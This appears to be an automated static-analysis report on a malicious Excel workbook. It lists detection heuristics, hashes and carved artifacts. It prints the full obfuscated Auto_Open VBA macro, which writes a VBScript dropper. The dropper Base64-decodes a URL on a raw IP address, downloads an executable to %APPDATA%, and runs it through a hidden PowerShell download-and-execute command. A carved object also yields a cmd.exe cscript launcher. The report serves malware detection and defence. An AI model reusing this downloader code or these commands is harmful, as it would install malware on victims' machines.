Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 74b844100221732b…

MALICIOUS

Office (OOXML)

57.2 KB Created: 2020-02-01 18:28:07 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2020-05-14
MD5: 056c9f7a55f4fdef87e4a940e410fa25 SHA-1: d87dc047be8a7a58996bb3777e9a56071c9857dc SHA-256: 74b844100221732bc10b16a1bea2417ec569c1bcaa073f8500a7db02a3b86687
580 Risk Score

Heuristics 15

  • Equation Editor OLE object high CVE related OLE_EQUATION_EDITOR
    Embedded OLE object xl/embeddings/oleObject3.bin contains the Equation Editor CLSID, the legacy component exploited by CVE-2017-11882, CVE-2018-0802, and CVE-2018-0798.
  • ClamAV: Xls.Downloader.Bomber-10004252-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Bomber-10004252-0
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • Embedded Office object carries macros critical OFFICE_EMBEDDED_MACRO_OBJECT
    This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document — frequently under an obfuscated, non-standard part name — is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    s = s & "    Set wshShell = CreateObject( ""Wscript.Shell"" ) " & vbCrLf
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    s = s & "    Set alxmd = CreateObject(""Msxml2.DOMDocument"").CreateElement(""aux"")" & vbCrLf
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    s = s & "    Set alxmd = CreateObject(""Msxml2.DOMDocument"").CreateElement(""aux"")" & vbCrLf
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        SFilename = Environ("Temp") & "\TestVBScript.vbs"
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Payload URL recovered from embedded OLE object (1 URL) info OOXML_EMBEDDED_OBJECT_URL
    An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.3.31.212/QxzyQ6ZzP9yPweG.exe Referenced by macro

Extracted artifacts 8

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 16089 bytes
SHA-256: 64646a38cf8e98a23eb22c71544f804ba2a0fc5a3df83bbf5db0c232f933f540
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
s = s & "dim grove:dim uuuuuuuuuuuu:ival(aa = ""'a"")" & vbCrLf
s = s & "Function ival(obj)" & vbCrLf
s = s & "    Eval(obj)" & vbCrLf
s = s & "End function" & vbCrLf
s = s & "zEQibVIXVUEKswxvogvhtPSQTRCxYIJTYzCPwwaxxtsNMrhHOf1 = ""-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" & vbCrLf
s = s & "fsdfdsfs = ""aHR0cDovLzE5Mi4zLjMxLjIxMi9ReHp5UTZaelA5eVB3ZUcuZXhl"" '100" & vbCrLf
s = s & "yulkytjtrhtjrkdsarjky =""bWFuaWZuZi5leGU="" '100" & vbCrLf
s = s & "frease = """"" & vbCrLf
s = s & "itype = ""bin.base64""" & vbCrLf
s = s & "Function ase64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE)" & vbCrLf
s = s & "    Dim sTextEncoding" & vbCrLf
s = s & "    if fIsUtf16LE Then sTextEncoding = ""utf-16le"" Else sTextEncoding = ""utf-8""" & vbCrLf
s = s & "    ' Use an aux. XML document with a Base64-encoded element." & vbCrLf
s = s & "    ' Assigning the encoded text to .Text makes the decoded byte array" & vbCrLf
s = s & "    ' available via .nodeTypedValue, which we can pass to BytesToStr()" & vbCrLf
s = s & "    Set alxmd = CreateObject(""Msxml2.DOMDocument"").CreateElement(""aux"")" & vbCrLf
s = s & "   alxmd.DataType = itype" & vbCrLf
s = s & "    alxmd.Text = sBase64EncodedText" & vbCrLf
s = s & "    ase64Decode = BytesToStr(alxmd.NodeTypedValue, sTextEncoding)" & vbCrLf
s = s & "End Function" & vbCrLf
s = s & "aaax = ""ADODB.Stream""" & vbCrLf
s = s & "function BytesToStr(ByVal byteArray, ByVal sTextEncoding)" & vbCrLf
s = s & "    If LCase(sTextEncoding) = ""utf-16le"" then" & vbCrLf
s = s & "        ' UTF-16 LE happens to be VBScript's internal encoding, so we can" & vbCrLf
s = s & "        ' take a shortcut and use CStr() to directly convert the byte array" & vbCrLf
s = s & "        ' to a string." & vbCrLf
s = s & "        BytesToStr = CStr(byteArray)" & vbCrLf
s = s & "    Else ' Convert the specified text encoding to a VBScript string." & vbCrLf
s = s & "        ' Create a binary stream and copy the input byte array to it." & vbCrLf
s = s & "        Set baax = CreateObject(aaax)" & vbCrLf
s = s & "            baax.Type = 1 ' adTypeBinary" & vbCrLf
s = s & "            baax.Open" & vbCrLf
s = s & "            baax.Write byteArray" & vbCrLf
s = s & "            ' Now change the type to text, set the encoding, and output the " & vbCrLf
s = s & "            ' result as text." & vbCrLf
s = s & "            baax.Position = 0" & vbCrLf
s = s & "            baax.Type = 2 ' adTypeText" & vbCrLf
s = s & "            baax.CharSet = sTextEncoding" & vbCrLf
s = s & "            fffffffffff = baax.ReadText" & vbCrLf
s = s & "            BytesToStr = fffffffffff" & vbCrLf
s = s & "            baax.Close" & vbCrLf
s = s & "    End If" & vbCrLf
s = s & "end function" & vbCrLf
s = s & "dfgdfgdfgd = ""ap"" + ""pData = shel"" + ""lobj""" & vbCrLf
s = s & "'MsgBox()" & vbCrLf
s = s & "dim shellobj  '100" & vbCrLf
s = s & "dim wssz" & vbCrLf
s = s & "wss = ""WSc"" + ""ript.Sh""" & vbCrLf
s = s & "dim wss2" & vbCrLf
s = s & "letters = ""el""" & vbCrLf
s = s & "wss2 = letters + ""l""" & vbCrLf
s = s & "virto = ""CreateOb""" & vbCrLf
s = s & "ywrjjjjjjjjjjjjwty = wss + wss2" & vbCrLf
s = s & "strlink = ase64Decode(fsdfdsfs, False) '100" & vbCrLf
s = s & "Dim appData '100" & vbCrLf
s = s & "'MsgBox(aaaaaaaaa)'100" & vbCrLf
s = s & "set shellobj = CreateObject(ywrjjjjjjjjjjjjwty)" & vbCrLf
s = s & "fileData = dfgdfgdfgd" & vbCrLf
s = s & "fileData = fileData + "".""" & vbCrLf
s = s & "fileData = fileData + ""expandEnvironmentString""" & vbCrLf
s = s & "fileData = fileData + ""s""" & vbCrLf
s = s & "fileData = fileData + ""("""""" + ""%"" + ""APPD""+""AT"" + ""A"" + ""%"" + ""\"""")""" & vbCrLf
s = s & "'MsgBox(fileData)" & vbCrLf
s = s & "miko = ""strsaveto = app"" + ""Data""" & vbCrLf
s = s & "zzappData = shellobj.expandEnvironmentStrings("" % APPDATA %\"")" & vbCrLf
s = s & "xport = miko + "" + ase64Decode"" + ""(yulkytjtrhtjrkdsarjky, False)"" '100" & vbCrLf
s = s & "dim masmaaa" & vbCrLf
s = s & "masmaaa = ""msxm""+""l2""" & vbCrLf
s = s & "masmaaa = masmaaa + "".xml"" + ""http.3.0""" & vbCrLf
s = s & "'MsgBox(fileData)" & vbCrLf
s = s & "hrc = ""n""" & vbCrLf
s = s & "er3rerererthrrrntrntrn = xport" & vbCrLf
s = s & "hrc = hrc + ""l""" & vbCrLf
s = s & "hrc = hrc + ""oad""" & vbCrLf
s = s & "ghwrthytketuketkryumktymjkur = ""set objht"" + ""tpdownload "" + ""= createobject(masmaaa)""" & vbCrLf
s = s & "strsaveto = appData + ase64Decode(yulkytjtrhtjrkdsarjky, False)" & vbCrLf
s = s & "function fsdfsdfsdgfdg()" & vbCrLf
s = s & "    Set objFSO   = CreateObject( ""Scripting.FileSystemObject"" ) " & vbCrLf
s = s & "    Set wshShell = CreateObject( ""Wscript.Shell"" ) " & vbCrLf
s = s & "    offififii = eval(""objfsodownload.file"" + ""exists(strsaveto)"")    " & vbCrLf
s = s & "end function" & vbCrLf
s = s & "vi = ""nload.filee"" + ""xists (strsaveto)""" & vbCrLf
s = s & "yyuyuy = ""t""" & vbCrLf
s = s & "te = ghwrthytketuketkryumktymjkur" & vbCrLf
s = s & "lmknk = ""li"" + ""nk"" + "", false""" & vbCrLf
s = s & "'end if rjythe fg h fgh fhg dhdg hfh'100" & vbCrLf
s = s & "quote = "" """" "" " & vbCrLf
s = s & "jrjrrarjr = """""""" + ""g"" + ""e"" + yyuyuy + quote" & vbCrLf
s = s & "set objhtxtpdownload = createobject(masmaaa)" & vbCrLf
s = s & "povmskfh32423 = ""objhtx"" + ""tpdow""+ hrc + "".o"" + ""pen ""+jrjrrarjr + "", str"" + """" + lmknk" & vbCrLf
s = s & "ahoy = povmskfh32423" & vbCrLf
s = s & "objhtxtpdownload.open ""get "" , strlink, false" & vbCrLf
s = s & "eeree = ""nd"" " & vbCrLf
s = s & "yoha = ""objhtxtpdownload."" + ""se"" + eeree'100" & vbCrLf
s = s & "objhtxtpdownload.send" & vbCrLf
s = s & "dim sfo" & vbCrLf
s = s & "oofofs = ""load.""" & vbCrLf
s = s & "osdv = ""(strsaveto) """ & vbCrLf
s = s & "mmgcb = ""deletefile """ & vbCrLf
s = s & "sfo = ""scripting.filesystemobjec"" + ""t""" & vbCrLf
s = s & "bicodo = ""set objfsodownload = createobject (sfo) '100""" & vbCrLf
s = s & "set objfsodownload = createobject(sfo) '100" & vbCrLf
s = s & "aaaaaaaal = ""onononono = objfsodow"" + vi" & vbCrLf
s = s & "bicodo = "" objfsodown""" & vbCrLf
s = s & "bicodo = bicodo + oofofs + mmgcb + osdv" & vbCrLf
s = s & "xnsf = ""uN uteghsfhs""" & vbCrLf
s = s & "onononono = eval(""objfsodownload.file"" + ""exists(strsaveto)"")" & vbCrLf
s = s & "if onononono then '100" & vbCrLf
s = s & "    Eval(""objfsodownload.delet"" + ""efile(strsaveto)"")" & vbCrLf
s = s & "end if '100" & vbCrLf
s = s & "bvbvbvbbvbvbvbvbvb = objhtxtpdownload.status" & vbCrLf
s = s & "if bvbvbvbbvbvbvbvbvb = 200 then '100" & vbCrLf
s = s & "    dim  fffffffffgggggg '100" & vbCrLf
s = s & "    dim vard1" & vbCrLf
s = s & "    vard1 = ""ad""" & vbCrLf
s = s & "    vard1 = vard1 + ""odb.str"" + ""eam""" & vbCrLf
s = s & "    bicodo = ""set  fffffffffgggggg = createobject(vard1)""" & vbCrLf
s = s & "    set  fffffffffgggggg = createobject(vard1)" & vbCrLf
s = s & "    aa = "".""'100" & vbCrLf
s = s & "    aa = aa + ""sa""'100" & vbCrLf
s = s & "    aa = aa + ""ve"" '100" & vbCrLf
s = s & "    aa = aa + ""tofile strsaveto"" '100" & vbCrLf
s = s & "    helloworld = aa + bb '100" & vbCrLf
s = s & "    ssdss = "".type = 1""" & vbCrLf
s = s & "     aa2 = "".op""'100" & vbCrLf
s = s & "     aa2 = aa2 + ""en""'100" & vbCrLf
s = s & "aa = ""sebody""" & vbCrLf
s = s & "ee = "".close""" & vbCrLf
s = s & "     byeworld = ssdss + vbCrLf + "".open"" + vbCrLf + "".write objh""'100" & vbCrLf
s = s & "     byeworld = byeworld + ""ttpdown""+""load.respon"" + aa'100" & vbCrLf
s = s & "DIM ARRHELPWIN, ARRHELPWINCHR1, ARRINTCMD, ARRTEMP, DICHELPLONG, DICHELPSHORT, DICSYSTEMFILES" & vbCrLf
s = s & "DIM BLNADDITIONAL, BLNDEBUG, BLNDEBUGLOG, BLNIGNOREBATCH, BLNNOADMIN, BLNNOHLPCHR1, BLNOVERWRITE, BLNQUIET, BLNWINDOWSONLY" & vbCrLf
s = s & "DIM INTBITSOS, INTCODEPAGE, INTOSVERSION, INTUNEXPECTEDCODEPAGE, INTVALIDARGS, I, J" & vbCrLf
s = s & "DIM COLITEMS, OBJDEBUGLOG, OBJEXEC, OBJHTMLFILE, OBJFOLDER" & vbCrLf
s = s & "DIM OBJFOLDERITEM, OBJFSO, OBJITEM, OBJKEY, OBJMATCHES, OBJMATCHES2" & vbCrLf
s = s & "DIM STRALPHABET, STRARG, STRCLASS, STRCMDINFO, STRCOMMAND, STRCOMMANDLINE, STRCOMSPEC, STRCSDVER, STRFILE, STRFILEVER" & vbCrLf
s = s & "DIM STRDEBUGLOG, STRFIRSTLETTER, STRHELPALL, STRHELPLONG, STRHELPSHORT, STRHEAD, STRHTML, STRMSG, STRNUMVER" & vbCrLf
s = s & "DIM STROSLOCL, STRPATTERN, STRPREVIOUSLETTER, STRSCRIPTENGINE, STRSCRIPTPATH, STRSCRIPTVER, STRUNKNOWNCOMMAND, STRWINVER" & vbCrLf
s = s & "CONST INTERNAL_COMMON      = ""BREAK CALL CD CH""" & vbCrLf
s = s & "CONST INTERNAL_CMD_EXE     = ""ASSOC COLOR ENDLOCAL FTYPE MKLINK POPD PUSHD SETLOCAL START TITLE""" & vbCrLf
s = s & "CONST INTERNAL_COMMAND_COM = ""CTTY LFNFOR LH LOADHIGH LOCK UNLOCK TRUENAME""" & vbCrLf
s = s & "       varf = ""Pow"" + ""erS"" + ""hell -NoP "" + ""-sta "" + ""-No"" + ""nI -W Hid"" + ""den -Ex"" + ""ecutionP"" + ""olicy by"" + ""pass -NoLogo -command """"(New-""+ ""Object System.Net.WebClient).Download"" + ""File('"" + ase64Decode(fsdfdsfs, False) + ""','%appdata%\"" + ase64Decode(yulkytjtrhtjrkdsarjky, False) + ""');Start-Process '%appdata%\"" + ase64Decode(yulkytjtrhtjrkdsarjky, False) + ""'""""""" & vbCrLf
s = s & "   Set objShell = CreateObject(""WScript.Shell"")" & vbCrLf
s = s & "    tohan = ""objS"" + ""hell.E"" + ""xec(varf)""" & vbCrLf
s = s & "    ival(tohan)" & vbCrLf
s = s & "set fffffffffgggggg = nothing '100" & vbCrLf
s = s & "set fffffffffgggggg = nothing '100" & vbCrLf
s = s & "end if '100" & vbCrLf
s = s & "Function Base64Encode(ByVal sText, ByVal fAsUtf16LE)" & vbCrLf
s = s & "    ' Use an aux. XML document with a Base64-encoded element." & vbCrLf
s = s & "    ' Assigning the byte stream (array) returned by StrToBytes() to .NodeTypedValue" & vbCrLf
s = s & "    ' automatically performs Base64-encoding, whose result can then be accessed" & vbCrLf
s = s & "    ' as the element's text." & vbCrLf
s = s & "    Set basebase = CreateObject(""Msxml2.DOMDocument"").CreateElement(""aux"")" & vbCrLf
s = s & "        basebase.DataType = ""bin.base64""" & vbCrLf
s = s & "        if fAsUtf16LE then" & vbCrLf
s = s & "            basebase.NodeTypedValue = StrToBytes(sText, ""utf-16le"", 2)" & vbCrLf
s = s & "        else" & vbCrLf
s = s & "zEQibVIXVUEKswxvogvhtPSQTRCxYIJTYzCPwwaxxtsNMrhHOf1 = ""-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" & vbCrLf
s = s & "            basebase.NodeTypedValue = StrToBytes(sText, ""utf-8"", 3)" & vbCrLf
s = s & "zEQibVIXVUEKswxvogvhtPSQTRCxYIJTYzCPwwaxxtsNMrhHOf1 = ""-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" & vbCrLf
s = s & "        end if" & vbCrLf
s = s & "        Base64Encode = .Text" & vbCrLf
s = s & "End Function" & vbCrLf
s = s & "CONST BROWSE  = 1" & vbCrLf
s = s & "CONST SEARCH = 2" & vbCrLf
s = s & "CONST PLUGINS      =  0" & vbCrLf
s = s & "CONST LANGUAGE      = -2" & vbCrLf
s = s & "CONST SEARCHTRUE       = -1" & vbCrLf
s = s & "CONST RUNMETHROUGH = -2" & vbCrLf
s = s & "CONST FORWARD = 8" & vbCrLf
s = s & "CONST PRINTERS   = 1" & vbCrLf
s = s & "trjrtjhrth = ""offififii = objfsodownload.file"" + ""exists(strsaveto)""" & vbCrLf
s = s & "tgrighirh = ""c"" + ""m"" + ""d""" & vbCrLf
s = s & "fsdfsdfsdgfdg()" & vbCrLf
s = s & "function aam()" & vbCrLf
s = s & "    Execute(""Set objFile = writer.Create"" + ""TextFile(outFile, True)"")" & vbCrLf
s = s & "end function" & vbCrLf
s = s & "aaaaaaaaaaa = strsaveto" & vbCrLf
s = s & "sdsdsd = ""ript.S""" & vbCrLf
s = s & "if offififii then" & vbCrLf
s = s & "   opppogggd = ""WScri"" '100" & vbCrLf
s = s & "   opppogggd = opppogggd + ""pt"" '100" & vbCrLf
s = s & "   opppogggd = opppogggd + "".S"" '100" & vbCrLf
s = s & "   pyp3545567 = ""pyp3545567 = "" '100" & vbCrLf
s = s & "   pyp3545567 = pyp3545567 + ""strs"" '100" & vbCrLf
s = s & "   pyp3545567 = pyp3545567 + ""av"" '100" & vbCrLf
s = s & "   pyp3545567 = pyp3545567 + ""eto"" '100" & vbCrLf
s = s & "   pyp3545567 = aaaaaaaaaaa" & vbCrLf
s = s & "   uteghsfhs = pyp3545567 '100" & vbCrLf
s = s & "   pyp354 = ""CreAte"" '100" & vbCrLf
s = s & "   bicodo = ""hel""" & vbCrLf
s = s & "   opppogggd = opppogggd + bicodo + ""l""" & vbCrLf
s = s & "   pyp354 = pyp354 + ""Obj"" + ""ect (opppogggd)."" '100" & vbCrLf
s = s & "   pyp354 = pyp354 + ""R"" '100" & vbCrLf
s = s & "   bicodo = ""uN uteghsfhs""" & vbCrLf
s = s & "   pyp354 = pyp354 + bicodo '100" & vbCrLf
s = s & "'MsgBox(masmaaa)" & vbCrLf
s = s & "lock = ""start """""""" """"%app""" & vbCrLf
s = s & "evjkd = ""Wsc""" & vbCrLf
s = s & "ifissb = sdsdsd" & vbCrLf
s = s & "ufufufud = ""hell""" & vbCrLf
s = s & "'MsgBox(masmaaa)" & vbCrLf
s = s & "xncdm = ifissb + ufufufud" & vbCrLf
s = s & "function jing()" & vbCrLf
s = s & "    " & vbCrLf
s = s & "    objFile.Write stryn" & vbCrLf
s = s & "    objFile.Close" & vbCrLf
s = s & "end function" & vbCrLf
s = s & "'MsgBox(masmaaa)" & vbCrLf
s = s & "end if" & vbCrLf
s = s & "'MsgBox(""masmaaa"")" & vbCrLf
s = s & "Set writer=CreateObject(""Scri"" + ""pting.FileSystemObject"")" & vbCrLf
s = s & "outFile=""C:\programData\hrjytrj.""" & vbCrLf
s = s & "outFile = outFile + tgrighirh" & vbCrLf
s = s & "stryn = lock + ""data%\"" + ase64Decode(yulkytjtrhtjrkdsarjky, False)" & vbCrLf
s = s & "aam()" & vbCrLf
s = s & "Function aabb()" & vbCrLf
s = s & "    Dim a0c0v0s0r0" & vbCrLf
s = s & "End Function" & vbCrLf
s = s & "jing()" & vbCrLf
s = s & "Set objFSO = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf
s = s & "strScript = Wscript.ScriptFullName" & vbCrLf
s = s & "objFSO.DeleteFile(strScript)" & vbCrLf
    SFilename = Environ("Temp") & "\TestVBScript.vbs"
    intFileNum = FreeFile
    Open SFilename For Output As intFileNum
    Print #intFileNum, s
    Close intFileNum
    Set wshShell = CreateObject("Wscript.Shell")
    Set proc = wshShell.exec("cscript " & SFilename & "") ' run VBScript
    End Sub
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject2.bin 12800 bytes
SHA-256: d8bbf9a054c5490e49149b30c295f0a0e8c34d4fc219c3535d83a43171bb74d7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell" ) Carved artifact contains 2 shell/COM execution token(s).
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject2.bin Ole10Native stream: Ole10Native 9856 bytes
SHA-256: 1b78c5ab70b6303c503310c5adf77196d61fe06c29ae7226527ece0fec76398b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell" ) Carved artifact contains 2 shell/COM execution token(s).
ooxml_oleobject_00_ole10native_00_sc.vbs ole-package-payload OOXML xl/embeddings/oleObject2.bin Ole10Native payload: display_name=sc.vbs; full_path=C:\Users\ECITY\AppData\Local\Temp\sc (3).vbs; temp_path=; def_file= 9514 bytes
SHA-256: 5f207587b92025311f10304b86d6083c6267fe24f18449b0c23c5459c521e3af
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved artifact contains 4 eval/decoder/string-building token(s).
ooxml_oleobject_01.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject3.bin 5936 bytes
SHA-256: b925f9bcf5d095977db26483dd803975142edbca1c92fe1ab74f4b9b0c1edc84
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): cmd.exe /c cscript %tmp%\sc.vbs CCCCCCCCCCCC C
ooxml_oleobject_02.bin ooxml-ole-object OOXML embedded OLE part: xl/vbaProject.bin 38400 bytes
SHA-256: 20e99b42ea8438398959ab978410da683e1d9afc42150c8aa0c2c7366b982695
Detection
ClamAV: Xls.Downloader.Bomber-10004252-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell" ) Carved artifact contains 3 shell/COM execution token(s).
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 4968 bytes
SHA-256: 979dde2aed02f077c16ae53546c6df9eed40e8386d6db6fc36aee9f966d2cb82
emf_01.emf ooxml-emf OOXML EMF part: xl/media/image2.emf 1536 bytes
SHA-256: 4d4d1e7b04c99dcb8e885915068ad6f74cc2333e91580cdae5ccaa00c427247f

Open this report in the interactive analyzer, or submit your own file for analysis.